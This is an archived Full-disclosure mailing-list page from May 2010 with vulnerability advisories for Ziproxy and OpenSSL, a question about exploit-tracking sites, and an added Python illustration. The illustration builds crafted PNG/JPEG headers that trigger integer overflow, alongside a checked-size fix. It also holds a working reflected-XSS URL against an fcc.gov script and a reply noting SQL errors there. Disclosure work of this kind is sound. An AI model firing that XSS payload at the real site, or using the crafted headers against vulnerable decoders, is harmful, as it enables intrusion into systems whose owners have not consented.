> exploits. milw0rm.com is one of the famous websites, but because it has
> stopped, which website is providing the best services like milw0rm? I
> found the hack0wn.com website. Is this website trustworthy? Can we track
> this website for the regular latest vulnerabilities? Or else could you
> please provide a list of websites for daily tracking of new
> vulnerabilities and exploits.
> 
> Thanks
> Kaushal.
> 



[Full-disclosure] Anybody know about "hack0wn" website please let me know

2010-05-24 Thread rajendra prasad
Hi List,

I am searching for a good website for tracking vulnerabilities and
exploits. milw0rm.com is one of the famous websites, but because it has
stopped, which website is providing the best services like milw0rm? I
found the hack0wn.com website. Is this website trustworthy? Can we track
this website for the regular latest vulnerabilities? Or else could you
please provide a list of websites for daily tracking of new
vulnerabilities and exploits.

Thanks
Kaushal.

[Full-disclosure] Secunia Research: Ziproxy Two Integer Overflow Vulnerabilities

2010-05-24 Thread Secunia Research
== 

 Secunia Research 24/05/2010

   - Ziproxy Two Integer Overflow Vulnerabilities -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* Ziproxy 3.0.0

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"Ziproxy is forwarding, non-caching, compressing HTTP proxy server.
Basically it squeezes images by converting them to lower quality JPEGs
or JPEG 2000 and compresses (gzip) HTML and other text-like data.".

Product Link:
http://ziproxy.sourceforge.net/

== 
4) Description of Vulnerability

Secunia Research has discovered two vulnerabilities in Ziproxy, which
can be exploited by malicious people to compromise a vulnerable 
system.

1) An integer overflow within the "jpg2bitmap()" function in
src/image.c can be exploited to cause a heap-based buffer overflow via
specially crafted JPG images.

2) An integer overflow within the "png2bitmap()" function in
src/image.c can be exploited to cause a heap-based buffer overflow via
specially crafted PNG images.

== 
5) Solution 

Update to version 3.0.1.

== 
6) Time Table 

19/05/2010 - Vendor notified.
19/05/2010 - Vendor response.
20/05/2010 - Vendor issues fixed version.
24/05/2010 - Public disclosure.

== 
7) Credits 

Discovered by Stefan Cornelius, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1513 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-75/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

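The Secunia advisory above names the bug class (an integer overflow in the image-to-bitmap conversion that turns into a heap overflow) but not the mechanics. The following is an added illustration written for this page, not Ziproxy's code: it reads the dimensions an untrusted PNG IHDR or JPEG SOF segment claims, computes the pixel-buffer size the way unchecked 32-bit C arithmetic would (the product wraps), and beside it the checked computation an image decoder should use before calling the allocator. The parsers are generic, the sample headers are constructed in the script, and the choice of 32 bits for the size type is an assumption about the vulnerable build rather than a fact from the advisory.

```python
"""Added illustration (not Ziproxy code) of the integer-overflow-to-heap-
overflow class: width * height * channels from an untrusted header wraps in
32-bit arithmetic, so a tiny buffer is allocated for a huge image. Parsers
are generic; sample files are constructed below."""
import struct
import zlib

UINT32_MAX = 0xFFFFFFFF
PNG_SIG = b"\x89PNG\r\n\x1a\n"
# PNG colour type -> samples per pixel (grey, RGB, palette, grey+alpha, RGBA)
PNG_CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}

def png_dimensions(data):
    """(width, height, channels) from the IHDR chunk, which must come first."""
    if not data.startswith(PNG_SIG) or len(data) < 33:
        raise ValueError("not a PNG")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("IHDR chunk missing or malformed")
    w, h, _depth, colour, _comp, _filt, _interlace = struct.unpack(">IIBBBBB", data[16:29])
    return w, h, PNG_CHANNELS[colour]

def jpeg_dimensions(data):
    """(width, height, components) from the first SOF0/SOF1/SOF2 segment."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("marker expected at offset %d" % i)
        marker = data[i + 1]
        seglen = struct.unpack(">H", data[i + 2:i + 4])[0]
        if marker in (0xC0, 0xC1, 0xC2):
            if len(data) < i + 10:
                raise ValueError("truncated SOF segment")
            _lf, _precision, h, w, ncomp = struct.unpack(">HBHHB", data[i + 2:i + 10])
            return w, h, ncomp
        i += 2 + seglen                 # skip to the next marker
    raise ValueError("no SOF segment found")

def bitmap_size_unchecked(w, h, channels):
    """What a 32-bit `w * h * channels` computes in C: the product wraps."""
    return (w * h * channels) & UINT32_MAX

def bitmap_size_checked(w, h, channels, limit=UINT32_MAX):
    """Same product, refused when it would not fit the allocator's size type."""
    if w == 0 or h == 0 or channels == 0:
        raise ValueError("zero-sized image")
    if h > limit // w or channels > limit // (w * h):
        raise OverflowError("%dx%dx%d does not fit in %d bytes" % (w, h, channels, limit))
    return w * h * channels

def screen(data):
    """Report both sizes for a PNG or JPEG header; safe_size is None on overflow."""
    if data.startswith(PNG_SIG):
        fmt, (w, h, ch) = "png", png_dimensions(data)
    else:
        fmt, (w, h, ch) = "jpeg", jpeg_dimensions(data)
    try:
        safe = bitmap_size_checked(w, h, ch)
    except OverflowError:
        safe = None
    return {"format": fmt, "width": w, "height": h, "channels": ch,
            "naive_size": bitmap_size_unchecked(w, h, ch), "safe_size": safe}

# --- constructed sample headers (only the bytes the parsers look at) --------
def make_png_header(w, h, colour_type):
    ihdr = struct.pack(">IIBBBBB", w, h, 8, colour_type, 0, 0, 0)
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + ihdr) & UINT32_MAX)
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + ihdr + crc

def make_jpeg_header(w, h, ncomp):
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    comps = b"".join(bytes([i + 1, 0x11, 0]) for i in range(ncomp))
    body = struct.pack(">BHHB", 8, h, w, ncomp) + comps
    sof0 = b"\xff\xc0" + struct.pack(">H", len(body) + 2) + body
    return b"\xff\xd8" + app0 + sof0

BENIGN_PNG   = make_png_header(640, 480, 6)       # 640x480 RGBA
CRAFTED_PNG  = make_png_header(65537, 65536, 2)   # RGB: 65537*65536*3 wraps to 0x30000
BENIGN_JPEG  = make_jpeg_header(1024, 768, 3)
CRAFTED_JPEG = make_jpeg_header(32768, 32768, 4)  # 2^30 pixels * 4 wraps to exactly 0

if __name__ == "__main__":
    for name in ("BENIGN_PNG", "CRAFTED_PNG", "BENIGN_JPEG", "CRAFTED_JPEG"):
        print(name, screen(globals()[name]))
```

The crafted PNG claims 65537x65536 RGB pixels; the wrapped size is 196608 bytes, so a decoder that trusts the product allocates under 200 KB and then writes gigabytes of pixel data into it. The crafted JPEG wraps to zero. The division-based check is the portable form of the test; on compilers that offer it, `__builtin_mul_overflow` does the same thing in C, and either should sit before every `malloc` whose size comes from a file.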


[Full-disclosure] rPSA-2010-0039-1 openssl openssl-scripts

2010-05-24 Thread rPath Update Announcements
rPath Security Advisory: 2010-0039-1
Published: 2010-05-23
Products:
rPath Appliance Platform Linux Service 1
rPath Appliance Platform Linux Service 2
rPath Linux 1
rPath Linux 2

Rating: Minor
Exposure Level Classification:
Remote User Deterministic Weakness
Updated Versions:
openssl=conary.rpath@rpl:1/0.9.7f-10.19-1
openssl=conary.rpath@rpl:2/0.9.8g-7.5-2
openssl-scripts=conary.rpath@rpl:2/0.9.8g-7.5-2

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-3201

References:
http://bugs.contribs.org/show_bug.cgi?id=195

Description:
A flaw in previous versions of OpenSSL could allow a malicious
client to force a ciphersuite not supported by the server to be 
used for a session between the client and the server, which can
result in disclosure of sensitive information.  This has been
fixed.

http://wiki.rpath.com/Advisories:rPSA-2010-0039

Copyright 2010 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



Re: [Full-disclosure] fcc.gov XSS

2010-05-24 Thread Zach C.
There seem to be a few more problems with that script than just that XSS...

For example, going to the Application Search page root (the page that takes
you to that one, presumably) and selecting literally everything in the
Services listbox will net you an error reporting "Incorrect syntax near ','"
for server 'HEIMDAL'. It apparently occurs on line 4. I dunno.

I'm not gonna mess around with it too much though :)

On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker <
marshallwhitta...@gmail.com> wrote:

> FCC.gov XSS
>
> --- CODE ---
>
>
> http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E
>
> --- CODE ---
>
>  --oxagast
>

[Full-disclosure] fcc.gov XSS

2010-05-24 Thread Marshall Whittaker
FCC.gov XSS

--- CODE ---

http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E

--- CODE ---

 --oxagast